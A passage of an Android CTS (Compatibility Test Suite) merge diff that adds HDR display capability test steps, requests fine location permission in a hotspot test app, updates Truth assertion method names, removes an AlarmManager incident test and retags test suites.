Snap for 7201877 from 6681fd3077cbf014211e2555c43eeba691e5140f to mainline-documentsui-release
Change-Id: I79e700bb49f9d5812b3207776f324467357a95cd
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/tv/display/DisplayHdrCapabilitiesTestActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/tv/display/DisplayHdrCapabilitiesTestActivity.java
index 72a34ba..3eab9f4 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/tv/display/DisplayHdrCapabilitiesTestActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/tv/display/DisplayHdrCapabilitiesTestActivity.java
@@ -75,6 +75,140 @@
mTestSequence.init();
}
+ private static class NonHdrDisplayTestStep extends SyncTestStep {
+
+ public NonHdrDisplayTestStep(TvAppVerifierActivity context) {
+ super(
+ context,
+ R.string.tv_hdr_capabilities_test_step_non_hdr_display,
+ getInstructionText(context),
+ getButtonStringId());
+ }
+
+ private static String getInstructionText(Context context) {
+ return context.getString(
+ R.string.tv_hdr_connect_no_hdr_display, context.getString(getButtonStringId()));
+ }
+
+ private static @StringRes int getButtonStringId() {
+ return R.string.tv_start_test;
+ }
+
+ @Override
+ public void runTest() {
+ DisplayManager displayManager = mContext.getSystemService(DisplayManager.class);
+ Display display = displayManager.getDisplay(Display.DEFAULT_DISPLAY);
+ getAsserter().withMessage("Display.isHdr()").that(display.isHdr()).isFalse();
+ getAsserter()
+ .withMessage("Display.getHdrCapabilities()")
+ .that(display.getHdrCapabilities().getSupportedHdrTypes())
+ .isEmpty();
+ }
+ }
+
+ private static class HdrDisplayTestStep extends SyncTestStep {
+
+ public HdrDisplayTestStep(TvAppVerifierActivity context) {
+ super(
+ context,
+ R.string.tv_hdr_capabilities_test_step_hdr_display,
+ getInstructionText(context),
+ getButtonStringId());
+ }
+
+ private static String getInstructionText(Context context) {
+ return context.getString(
+ R.string.tv_hdr_connect_hdr_display, context.getString(getButtonStringId()));
+ }
+
+ private static @StringRes int getButtonStringId() {
+ return R.string.tv_start_test;
+ }
+
+ @Override
+ public void runTest() {
+ DisplayManager displayManager = mContext.getSystemService(DisplayManager.class);
+ Display display = displayManager.getDisplay(Display.DEFAULT_DISPLAY);
+
+ getAsserter().withMessage("Display.isHdr()").that(display.isHdr()).isTrue();
+
+ Display.HdrCapabilities hdrCapabilities = display.getHdrCapabilities();
+
+ int[] supportedHdrTypes = hdrCapabilities.getSupportedHdrTypes();
+ Arrays.sort(supportedHdrTypes);
+
+ getAsserter()
+ .withMessage("Display.getHdrCapabilities().getSupportedTypes()")
+ .that(supportedHdrTypes)
+ .isEqualTo(
+ new int[] {
+ Display.HdrCapabilities.HDR_TYPE_DOLBY_VISION,
+ Display.HdrCapabilities.HDR_TYPE_HDR10,
+ Display.HdrCapabilities.HDR_TYPE_HDR10_PLUS,
+ Display.HdrCapabilities.HDR_TYPE_HLG
+ });
+
+ float maxLuminance = hdrCapabilities.getDesiredMaxLuminance();
+ getAsserter()
+ .withMessage("Display.getHdrCapabilities().getDesiredMaxLuminance()")
+ .that(maxLuminance)
+ .isIn(Range.openClosed(0f, MAX_EXPECTED_LUMINANCE));
+
+ float minLuminance = hdrCapabilities.getDesiredMinLuminance();
+ getAsserter()
+ .withMessage("Display.getHdrCapabilities().getDesiredMinLuminance()")
+ .that(minLuminance)
+ .isIn(Range.closedOpen(0f, MAX_EXPECTED_LUMINANCE));
+
+ getAsserter()
+ .withMessage("Display.getHdrCapabilities().getDesiredMaxAverageLuminance()")
+ .that(hdrCapabilities.getDesiredMaxAverageLuminance())
+ .isIn(Range.openClosed(minLuminance, maxLuminance));
+ }
+ }
+
+ private static class NoDisplayTestStep extends AsyncTestStep {
+ public NoDisplayTestStep(TvAppVerifierActivity context) {
+ super(
+ context,
+ R.string.tv_hdr_capabilities_test_step_no_display,
+ getInstructionText(context),
+ getButtonStringId());
+ }
+
+ private static String getInstructionText(Context context) {
+ return context.getString(
+ R.string.tv_hdr_disconnect_display,
+ context.getString(getButtonStringId()),
+ DISPLAY_DISCONNECT_WAIT_TIME_SECONDS,
+ DISPLAY_DISCONNECT_WAIT_TIME_SECONDS + 1);
+ }
+
+ private static @StringRes int getButtonStringId() {
+ return R.string.tv_start_test;
+ }
+
+ @Override
+ public void runTestAsync() {
+ // Wait for the user to disconnect the display.
+ final long delay = Duration.ofSeconds(DISPLAY_DISCONNECT_WAIT_TIME_SECONDS).toMillis();
+ mContext.getPostTarget().postDelayed(this::runTest, delay);
+ }
+
+ private void runTest() {
+ try {
+ // Verify the display APIs do not crash when the display is disconnected
+ DisplayManager displayManager = mContext.getSystemService(DisplayManager.class);
+ Display display = displayManager.getDisplay(Display.DEFAULT_DISPLAY);
+ display.isHdr();
+ display.getHdrCapabilities();
+ } catch (Exception e) {
+ getAsserter().withMessage(Throwables.getStackTraceAsString(e)).fail();
+ }
+ done();
+ }
+ }
+
private static class TvPanelReportedTypesAreSupportedTestStep extends YesNoTestStep {
public TvPanelReportedTypesAreSupportedTestStep(TvAppVerifierActivity context) {
super(context, getInstructionText(context), R.string.tv_yes, R.string.tv_no);
diff --git a/apps/hotspot/AndroidManifest.xml b/apps/hotspot/AndroidManifest.xml
index 277be5f..fd8b045 100644
--- a/apps/hotspot/AndroidManifest.xml
+++ b/apps/hotspot/AndroidManifest.xml
@@ -5,6 +5,7 @@
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
+ <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<application>
<activity android:name=".MainActivity">
<intent-filter>
diff --git a/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java b/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java
index 2e0ed87..eb81563 100644
--- a/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java
+++ b/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java
@@ -16,5 +16,11 @@
ActivityCompat.requestPermissions(
this, new String[] {Manifest.permission.ACCESS_COARSE_LOCATION}, 2);
}
+
+ if (ActivityCompat.checkSelfPermission(this, Manifest.permission.ACCESS_FINE_LOCATION)
+ != PackageManager.PERMISSION_GRANTED) {
+ ActivityCompat.requestPermissions(
+ this, new String[] {Manifest.permission.ACCESS_FINE_LOCATION}, 2);
+ }
}
}
diff --git a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/RetryRuleTest.java b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/RetryRuleTest.java
index 571a1b8..5a6a5ef 100644
--- a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/RetryRuleTest.java
+++ b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/RetryRuleTest.java
@@ -118,7 +118,7 @@
new RetryableStatement<RetryableException>(3, sRetryableException, cleaner),
mDescription).evaluate());
- assertThat(actualException).isSameAs(sRetryableException);
+ assertThat(actualException).isSameInstanceAs(sRetryableException);
verify(cleaner, times(2)).run();
}
@@ -143,7 +143,7 @@
final RetryableException actualException = expectThrows(RetryableException.class,
() -> rule.apply(mMockStatement, mDescription).evaluate());
- assertThat(actualException).isSameAs(exception);
+ assertThat(actualException).isSameInstanceAs(exception);
verify(mMockStatement, times(1)).evaluate();
verify(cleaner, never()).run();
}
@@ -169,7 +169,7 @@
() -> rule.apply(new RetryableStatement<RetryableException>(2, sRetryableException),
mDescription).evaluate());
- assertThat(actualException).isSameAs(sRetryableException);
+ assertThat(actualException).isSameInstanceAs(sRetryableException);
}
@Test
@@ -190,7 +190,7 @@
final RetryableException actualException = expectThrows(RetryableException.class,
() -> rule.apply(mMockStatement, mDescription).evaluate());
- assertThat(actualException).isSameAs(exception);
+ assertThat(actualException).isSameInstanceAs(exception);
verify(mMockStatement, times(1)).evaluate();
}
@@ -203,7 +203,7 @@
final RuntimeException actualException = expectThrows(RuntimeException.class,
() -> rule.apply(mMockStatement, mDescription).evaluate());
- assertThat(actualException).isSameAs(exception);
+ assertThat(actualException).isSameInstanceAs(exception);
verify(mMockStatement, times(1)).evaluate();
}
}
diff --git a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/SafeCleanerRuleTest.java b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/SafeCleanerRuleTest.java
index a56d7b2..9c82a1e 100644
--- a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/SafeCleanerRuleTest.java
+++ b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/SafeCleanerRuleTest.java
@@ -75,7 +75,7 @@
final SafeCleanerRule rule = new SafeCleanerRule();
final Throwable actualException = expectThrows(RuntimeException.class,
() -> rule.apply(new FailureStatement(mRuntimeException), mDescription).evaluate());
- assertThat(actualException).isSameAs(mRuntimeException);
+ assertThat(actualException).isSameInstanceAs(mRuntimeException);
}
@Test
@@ -83,7 +83,7 @@
final SafeCleanerRule rule = new SafeCleanerRule().setDumper(mDumper);
final Throwable actualException = expectThrows(RuntimeException.class,
() -> rule.apply(new FailureStatement(mRuntimeException), mDescription).evaluate());
- assertThat(actualException).isSameAs(mRuntimeException);
+ assertThat(actualException).isSameInstanceAs(mRuntimeException);
verify(mDumper).dump("Whatever", actualException);
}
@@ -94,7 +94,7 @@
.add(mGoodGuyExtraExceptions1);
final Throwable actualException = expectThrows(RuntimeException.class,
() -> rule.apply(new FailureStatement(mRuntimeException), mDescription).evaluate());
- assertThat(actualException).isSameAs(mRuntimeException);
+ assertThat(actualException).isSameInstanceAs(mRuntimeException);
verify(mGoodGuyRunner1).run();
verify(mGoodGuyExtraExceptions1).call();
}
@@ -107,7 +107,7 @@
.add(mGoodGuyExtraExceptions1);
final Throwable actualException = expectThrows(RuntimeException.class,
() -> rule.apply(new FailureStatement(mRuntimeException), mDescription).evaluate());
- assertThat(actualException).isSameAs(mRuntimeException);
+ assertThat(actualException).isSameInstanceAs(mRuntimeException);
verify(mGoodGuyRunner1).run();
verify(mGoodGuyExtraExceptions1).call();
verify(mDumper).dump("Whatever", actualException);
@@ -122,7 +122,7 @@
.add(mGoodGuyExtraExceptions1);
final Throwable actualException = expectThrows(RuntimeException.class,
() -> rule.apply(mGoodGuyStatement, mDescription).evaluate());
- assertThat(actualException).isSameAs(mRuntimeException);
+ assertThat(actualException).isSameInstanceAs(mRuntimeException);
verify(mGoodGuyRunner1).run();
verify(mGoodGuyRunner2).run();
verify(mGoodGuyExtraExceptions1).call();
@@ -140,7 +140,7 @@
.add(mGoodGuyExtraExceptions1);
final Throwable actualException = expectThrows(RuntimeException.class,
() -> rule.apply(mGoodGuyStatement, mDescription).evaluate());
- assertThat(actualException).isSameAs(mRuntimeException);
+ assertThat(actualException).isSameInstanceAs(mRuntimeException);
verify(mGoodGuyRunner1).run();
verify(mGoodGuyRunner2).run();
verify(mGoodGuyExtraExceptions1).call();
@@ -156,7 +156,7 @@
.run(mGoodGuyRunner2);
final Throwable actualException = expectThrows(RuntimeException.class,
() -> rule.apply(mGoodGuyStatement, mDescription).evaluate());
- assertThat(actualException).isSameAs(mRuntimeException);
+ assertThat(actualException).isSameInstanceAs(mRuntimeException);
verify(mGoodGuyRunner1).run();
verify(mGoodGuyRunner2).run();
verify(mGoodGuyExtraExceptions1).call();
@@ -173,7 +173,7 @@
.run(mGoodGuyRunner2);
final Throwable actualException = expectThrows(RuntimeException.class,
() -> rule.apply(mGoodGuyStatement, mDescription).evaluate());
- assertThat(actualException).isSameAs(mRuntimeException);
+ assertThat(actualException).isSameInstanceAs(mRuntimeException);
verify(mGoodGuyRunner1).run();
verify(mGoodGuyRunner2).run();
verify(mGoodGuyExtraExceptions1).call();
@@ -189,7 +189,7 @@
.run(mGoodGuyRunner2);
final Throwable actualException = expectThrows(RuntimeException.class,
() -> rule.apply(mGoodGuyStatement, mDescription).evaluate());
- assertThat(actualException).isSameAs(mRuntimeException);
+ assertThat(actualException).isSameInstanceAs(mRuntimeException);
verify(mGoodGuyRunner1).run();
verify(mGoodGuyRunner2).run();
verify(mGoodGuyExtraExceptions1).call();
diff --git a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateChangerRuleTest.java b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateChangerRuleTest.java
index 9b1851e..7559ddc 100644
--- a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateChangerRuleTest.java
+++ b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateChangerRuleTest.java
@@ -117,7 +117,7 @@
final RuntimeException actualException = expectThrows(RuntimeException.class,
() -> rule.apply(mStatement, mDescription).evaluate());
- assertThat(actualException).isSameAs(mRuntimeException);
+ assertThat(actualException).isSameInstanceAs(mRuntimeException);
verify(mStateManager, times(2)).get(); // Needed because of verifyNoMoreInteractions()
verify(mStateManager, times(1)).set("newValue");
@@ -134,7 +134,7 @@
final RuntimeException actualException = expectThrows(RuntimeException.class,
() -> rule.apply(mStatement, mDescription).evaluate());
- assertThat(actualException).isSameAs(mRuntimeException);
+ assertThat(actualException).isSameInstanceAs(mRuntimeException);
verify(mStateManager, never()).set(anyString());
}
@@ -148,7 +148,7 @@
final RuntimeException actualException = expectThrows(RuntimeException.class,
() -> rule.apply(mStatement, mDescription).evaluate());
- assertThat(actualException).isSameAs(mRuntimeException);
+ assertThat(actualException).isSameInstanceAs(mRuntimeException);
verify(mStateManager, times(2)).get(); // Needed because of verifyNoMoreInteractions()
verify(mStateManager, times(1)).set("newValue");
@@ -164,7 +164,7 @@
final RuntimeException actualException = expectThrows(RuntimeException.class,
() -> rule.apply(mStatement, mDescription).evaluate());
- assertThat(actualException).isSameAs(mRuntimeException);
+ assertThat(actualException).isSameInstanceAs(mRuntimeException);
verify(mStateManager, times(2)).get(); // Needed because of verifyNoMoreInteractions()
verify(mStateManager, times(1)).set("sameValue");
diff --git a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateKeeperRuleTest.java b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateKeeperRuleTest.java
index 4599aca..becf079 100644
--- a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateKeeperRuleTest.java
+++ b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateKeeperRuleTest.java
@@ -74,7 +74,7 @@
final RuntimeException actualException = expectThrows(RuntimeException.class,
() -> rule.apply(mStatement, mDescription).evaluate());
- assertThat(actualException).isSameAs(mRuntimeException);
+ assertThat(actualException).isSameInstanceAs(mRuntimeException);
verify(mStateManager, times(2)).get(); // Needed because of verifyNoMoreInteractions()
verify(mStateManager, times(1)).set("before");
verifyNoMoreInteractions(mStateManager); // Make sure set() was not called again
@@ -100,7 +100,7 @@
final RuntimeException actualException = expectThrows(RuntimeException.class,
() -> rule.apply(mStatement, mDescription).evaluate());
- assertThat(actualException).isSameAs(mRuntimeException);
+ assertThat(actualException).isSameInstanceAs(mRuntimeException);
verify(mStateManager, never()).set(anyString());
}
diff --git a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/TimeoutTest.java b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/TimeoutTest.java
index 8992d18..fdc4de6 100644
--- a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/TimeoutTest.java
+++ b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/TimeoutTest.java
@@ -105,7 +105,7 @@
final Timeout timeout = new Timeout(mSleeper, NAME, 100, 2, 500);
final Object result = new Object();
when(mJob.call()).thenReturn(result);
- assertThat(timeout.run(DESC, 1, mJob)).isSameAs(result);
+ assertThat(timeout.run(DESC, 1, mJob)).isSameInstanceAs(result);
assertThat(mSleeper.totalSleepingTime).isEqualTo(0);
}
@@ -114,7 +114,7 @@
final Timeout timeout = new Timeout(mSleeper, NAME, 100, 2, 500);
final Object result = new Object();
when(mJob.call()).thenReturn((Object) null, result);
- assertThat(timeout.run(DESC, 10, mJob)).isSameAs(result);
+ assertThat(timeout.run(DESC, 10, mJob)).isSameInstanceAs(result);
assertThat(mSleeper.totalSleepingTime).isEqualTo(10);
}
@@ -124,7 +124,7 @@
final RetryableException e = expectThrows(RetryableException.class,
() -> timeout.run(DESC, 10, mJob));
assertThat(e.getMessage()).contains(DESC);
- assertThat(e.getTimeout()).isSameAs(timeout);
+ assertThat(e.getTimeout()).isSameInstanceAs(timeout);
assertThat(mSleeper.totalSleepingTime).isEqualTo(100);
}
diff --git a/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesValidConfigTest.java b/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesValidConfigTest.java
index c5e72b9..8088411 100644
--- a/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesValidConfigTest.java
+++ b/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesValidConfigTest.java
@@ -208,7 +208,7 @@
* The device may contain extra changes, but none may be removed.
*/
public void testDeviceContainsExpectedConfig() throws Exception {
- assertThat(getOnDeviceCompatConfig()).containsAllIn(getExpectedCompatConfig());
+ assertThat(getOnDeviceCompatConfig()).containsAtLeastElementsIn(getExpectedCompatConfig());
}
}
diff --git a/hostsidetests/appsecurity/Android.bp b/hostsidetests/appsecurity/Android.bp
index 3a569db..30a6ba3 100644
--- a/hostsidetests/appsecurity/Android.bp
+++ b/hostsidetests/appsecurity/Android.bp
@@ -40,7 +40,8 @@
"cts",
"vts10",
"general-tests",
- "mts",
+ "mts-documentsui",
+ "mts-mediaprovider",
"sts",
],
diff --git a/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java b/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java
index 1da1202..eef1577 100644
--- a/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java
+++ b/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java
@@ -93,6 +93,7 @@
private Intent getHttpIntent() {
Intent i = new Intent(Intent.ACTION_VIEW);
i.addCategory(Intent.CATEGORY_BROWSABLE);
+ i.addCategory(Intent.CATEGORY_DEFAULT);
i.setData(Uri.parse("http://com.android.cts.intent.receiver"));
return i;
}
diff --git a/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/ManagedProfileCrossProfileTest.java b/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/ManagedProfileCrossProfileTest.java
index 9873fb2..b9a8041 100644
--- a/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/ManagedProfileCrossProfileTest.java
+++ b/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/ManagedProfileCrossProfileTest.java
@@ -621,7 +621,7 @@
throws Exception {
Set<String> currentPids = new HashSet<>(
Arrays.asList(getAppPid(packageName).split(" ")));
- assertThat(currentPids).containsAllIn(pids);
+ assertThat(currentPids).containsAtLeastElementsIn(pids);
}
private void assertAppKilledInBothProfiles(String packageName, List<String> pids)
diff --git a/hostsidetests/incident/src/com/android/server/cts/AlarmManagerIncidentTest.java b/hostsidetests/incident/src/com/android/server/cts/AlarmManagerIncidentTest.java
deleted file mode 100644
index 8093dc3..0000000
--- a/hostsidetests/incident/src/com/android/server/cts/AlarmManagerIncidentTest.java
+++ /dev/null
@@ -1,219 +0,0 @@
-/*
- * Copyright (C) 2016 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package com.android.server.cts;
-
-import com.android.server.AlarmClockMetadataProto;
-import com.android.server.AlarmManagerServiceDumpProto;
-import com.android.server.AlarmProto;
-import com.android.server.BatchProto;
-import com.android.server.BroadcastStatsProto;
-import com.android.server.ConstantsProto;
-import com.android.server.FilterStatsProto;
-import com.android.server.AppStateTrackerProto;
-import com.android.server.AppStateTrackerProto.RunAnyInBackgroundRestrictedPackages;
-import com.android.server.IdleDispatchEntryProto;
-import com.android.server.InFlightProto;
-import com.android.server.WakeupEventProto;
-import java.util.List;
-
-/**
- * Test to check that the alarm manager service properly outputs its dump state.
- */
-public class AlarmManagerIncidentTest extends ProtoDumpTestCase {
- public void testAlarmManagerServiceDump() throws Exception {
- final AlarmManagerServiceDumpProto dump =
- getDump(AlarmManagerServiceDumpProto.parser(), "dumpsys alarm --proto");
-
- verifyAlarmManagerServiceDumpProto(dump, PRIVACY_NONE);
- }
-
- static void verifyAlarmManagerServiceDumpProto(AlarmManagerServiceDumpProto dump, final int filterLevel) throws Exception {
- // Times should be positive.
- assertTrue(0 < dump.getCurrentTime());
- assertTrue(0 < dump.getElapsedRealtime());
- // Can be 0 if the time hasn't been changed yet.
- assertTrue(0 <= dump.getLastTimeChangeClockTime());
- assertTrue(0 <= dump.getLastTimeChangeRealtime());
-
- // ConstantsProto
- ConstantsProto settings = dump.getSettings();
- assertTrue(0 < settings.getMinFuturityDurationMs());
- assertTrue(0 < settings.getMinIntervalDurationMs());
- assertTrue(0 < settings.getListenerTimeoutDurationMs());
- assertTrue(0 < settings.getAllowWhileIdleShortDurationMs());
- assertTrue(0 < settings.getAllowWhileIdleLongDurationMs());
- assertTrue(0 < settings.getAllowWhileIdleWhitelistDurationMs());
-
- // AppStateTrackerProto
- AppStateTrackerProto appStateTracker = dump.getAppStateTracker();
- for (int uid : appStateTracker.getForegroundUidsList()) {
- // 0 is technically a valid UID.
- assertTrue(0 <= uid);
- }
- for (int aid : appStateTracker.getPowerSaveWhitelistAppIdsList()) {
- assertTrue(0 <= aid);
- }
- for (int aid : appStateTracker.getTempPowerSaveWhitelistAppIdsList()) {
- assertTrue(0 <= aid);
- }
- for (RunAnyInBackgroundRestrictedPackages r : appStateTracker.getRunAnyInBackgroundRestrictedPackagesList()) {
- assertTrue(0 <= r.getUid());
- }
-
- if (!dump.getIsInteractive()) {
- // These are only valid if is_interactive is false.
- assertTrue(0 < dump.getTimeSinceNonInteractiveMs());
- assertTrue(0 < dump.getMaxWakeupDelayMs());
- assertTrue(0 < dump.getTimeSinceLastDispatchMs());
- // time_until_next_non_wakeup_delivery_ms could be negative if the delivery time is in the past.
- }
-
- assertTrue(0 < dump.getTimeUntilNextWakeupMs());
- assertTrue(0 < dump.getTimeSinceLastWakeupMs());
- assertTrue(0 < dump.getTimeSinceLastWakeupSetMs());
- assertTrue(0 <= dump.getTimeChangeEventCount());
-
- for (int aid : dump.getDeviceIdleUserWhitelistAppIdsList()) {
- assertTrue(0 <= aid);
- }
-
- // AlarmClockMetadataProto
- for (AlarmClockMetadataProto ac : dump.getNextAlarmClockMetadataList()) {
- assertTrue(0 <= ac.getUser());
- assertTrue(0 < ac.getTriggerTimeMs());
- }
-
- for (BatchProto b : dump.getPendingAlarmBatchesList()) {
- final long start = b.getStartRealtime();
- final long end = b.getEndRealtime();
- assertTrue("Batch start time (" + start+ ") is negative", 0 <= start);
- assertTrue("Batch end time (" + end + ") is negative", 0 <= end);
- assertTrue("Batch start time (" + start + ") is after its end time (" + end + ")",
- start <= end);
- testAlarmProtoList(b.getAlarmsList(), filterLevel);
- }
-
- testAlarmProtoList(dump.getPendingUserBlockedBackgroundAlarmsList(), filterLevel);
-
- testAlarmProto(dump.getPendingIdleUntil(), filterLevel);
-
- testAlarmProtoList(dump.getPendingWhileIdleAlarmsList(), filterLevel);
-
- testAlarmProto(dump.getNextWakeFromIdle(), filterLevel);
-
- testAlarmProtoList(dump.getPastDueNonWakeupAlarmsList(), filterLevel);
-
- assertTrue(0 <= dump.getDelayedAlarmCount());
- assertTrue(0 <= dump.getTotalDelayTimeMs());
- assertTrue(0 <= dump.getMaxDelayDurationMs());
- assertTrue(0 <= dump.getMaxNonInteractiveDurationMs());
-
- assertTrue(0 <= dump.getBroadcastRefCount());
- assertTrue(0 <= dump.getPendingIntentSendCount());
- assertTrue(0 <= dump.getPendingIntentFinishCount());
- assertTrue(0 <= dump.getListenerSendCount());
- assertTrue(0 <= dump.getListenerFinishCount());
-
- for (InFlightProto f : dump.getOutstandingDeliveriesList()) {
- assertTrue(0 <= f.getUid());
- assertTrue(0 < f.getWhenElapsedMs());
- testBroadcastStatsProto(f.getBroadcastStats());
- testFilterStatsProto(f.getFilterStats(), filterLevel);
- if (filterLevel == PRIVACY_AUTO) {
- assertTrue(f.getTag().isEmpty());
- }
- }
-
- for (AlarmManagerServiceDumpProto.LastAllowWhileIdleDispatch l : dump.getLastAllowWhileIdleDispatchTimesList()) {
- assertTrue(0 <= l.getUid());
- assertTrue(0 < l.getTimeMs());
- }
-
- for (AlarmManagerServiceDumpProto.TopAlarm ta : dump.getTopAlarmsList()) {
- assertTrue(0 <= ta.getUid());
- testFilterStatsProto(ta.getFilter(), filterLevel);
- }
-
- for (AlarmManagerServiceDumpProto.AlarmStat as : dump.getAlarmStatsList()) {
- testBroadcastStatsProto(as.getBroadcast());
- for (FilterStatsProto f : as.getFiltersList()) {
- testFilterStatsProto(f, filterLevel);
- }
- }
-
- for (IdleDispatchEntryProto id : dump.getAllowWhileIdleDispatchesList()) {
- assertTrue(0 <= id.getUid());
- assertTrue(0 <= id.getEntryCreationRealtime());
- assertTrue(0 <= id.getArgRealtime());
- if (filterLevel == PRIVACY_AUTO) {
- assertTrue(id.getTag().isEmpty());
- }
- }
-
- for (WakeupEventProto we : dump.getRecentWakeupHistoryList()) {
- assertTrue(0 <= we.getUid());
- assertTrue(0 <= we.getWhen());
- }
- }
-
- private static void testAlarmProtoList(List<AlarmProto> alarms, final int filterLevel) throws Exception {
- for (AlarmProto a : alarms) {
- testAlarmProto(a, filterLevel);
- }
- }
-
- private static void testAlarmProto(AlarmProto alarm, final int filterLevel) throws Exception {
- assertNotNull(alarm);
-
- if (filterLevel == PRIVACY_AUTO) {
- assertTrue(alarm.getTag().isEmpty());
- assertTrue(alarm.getListener().isEmpty());
- }
- // alarm.time_until_when_elapsed_ms can be negative if 'when' is in the past.
- assertTrue(0 <= alarm.getWindowLengthMs());
- assertTrue(0 <= alarm.getRepeatIntervalMs());
- assertTrue(0 <= alarm.getCount());
- }
-
- private static void testBroadcastStatsProto(BroadcastStatsProto broadcast) throws Exception {
- assertNotNull(broadcast);
-
- assertTrue(0 <= broadcast.getUid());
- assertTrue(0 <= broadcast.getTotalFlightDurationMs());
- assertTrue(0 <= broadcast.getCount());
- assertTrue(0 <= broadcast.getWakeupCount());
- assertTrue(0 <= broadcast.getStartTimeRealtime());
- // Nesting should be non-negative.
- assertTrue(0 <= broadcast.getNesting());
- }
-
- private static void testFilterStatsProto(FilterStatsProto filter, final int filterLevel) throws Exception {
- assertNotNull(filter);
-
- if (filterLevel == PRIVACY_AUTO) {
- assertTrue(filter.getTag().isEmpty());
- }
- assertTrue(0 <= filter.getLastFlightTimeRealtime());
- assertTrue(0 <= filter.getTotalFlightDurationMs());
- assertTrue(0 <= filter.getCount());
- assertTrue(0 <= filter.getWakeupCount());
- assertTrue(0 <= filter.getStartTimeRealtime());
- // Nesting should be non-negative.
- assertTrue(0 <= filter.getNesting());
- }
-}
-
diff --git a/hostsidetests/incident/src/com/android/server/cts/IncidentdTest.java b/hostsidetests/incident/src/com/android/server/cts/IncidentdTest.java
index a262209..5b74593 100644
--- a/hostsidetests/incident/src/com/android/server/cts/IncidentdTest.java
+++ b/hostsidetests/incident/src/com/android/server/cts/IncidentdTest.java
@@ -69,8 +69,6 @@
ActivityManagerIncidentTest.verifyActivityManagerServiceDumpProcessesProto(dump.getAmprocesses(), filterLevel);
- AlarmManagerIncidentTest.verifyAlarmManagerServiceDumpProto(dump.getAlarm(), filterLevel);
-
// GraphicsStats is expected to be all AUTOMATIC.
WindowManagerIncidentTest.verifyWindowManagerServiceDumpProto(dump.getWindow(), filterLevel);
diff --git a/hostsidetests/scopedstorage/Android.bp b/hostsidetests/scopedstorage/Android.bp
index 480e2d3..44f4905 100644
--- a/hostsidetests/scopedstorage/Android.bp
+++ b/hostsidetests/scopedstorage/Android.bp
@@ -19,7 +19,7 @@
sdk_version: "test_current",
srcs: ["ScopedStorageTestHelper/src/**/*.java"],
// Tag as a CTS artifact
- test_suites: ["device-tests", "mts", "cts"],
+ test_suites: ["device-tests", "mts-mediaprovider", "cts"],
}
android_test_helper_app {
name: "CtsScopedStorageTestAppB",
@@ -28,7 +28,7 @@
sdk_version: "test_current",
srcs: ["ScopedStorageTestHelper/src/**/*.java"],
// Tag as a CTS artifact
- test_suites: ["device-tests", "mts", "cts"],
+ test_suites: ["device-tests", "mts-mediaprovider", "cts"],
}
android_test_helper_app {
name: "CtsScopedStorageTestAppC",
@@ -37,7 +37,7 @@
sdk_version: "test_current",
srcs: ["ScopedStorageTestHelper/src/**/*.java"],
// Tag as a CTS artifact
- test_suites: ["device-tests", "mts", "cts"],
+ test_suites: ["device-tests", "mts-mediaprovider", "cts"],
}
android_test_helper_app {
name: "CtsScopedStorageTestAppCLegacy",
@@ -47,7 +47,7 @@
target_sdk_version: "28",
srcs: ["ScopedStorageTestHelper/src/**/*.java"],
// Tag as a CTS artifact
- test_suites: ["device-tests", "mts", "cts"],
+ test_suites: ["device-tests", "mts-mediaprovider", "cts"],
}
android_test_helper_app {
name: "CtsScopedStorageTestAppDLegacy",
@@ -57,7 +57,7 @@
target_sdk_version: "28",
srcs: ["ScopedStorageTestHelper/src/**/*.java"],
// Tag as a CTS artifact
- test_suites: ["device-tests", "mts", "cts"],
+ test_suites: ["device-tests", "mts-mediaprovider", "cts"],
}
android_test_helper_app {
@@ -67,7 +67,7 @@
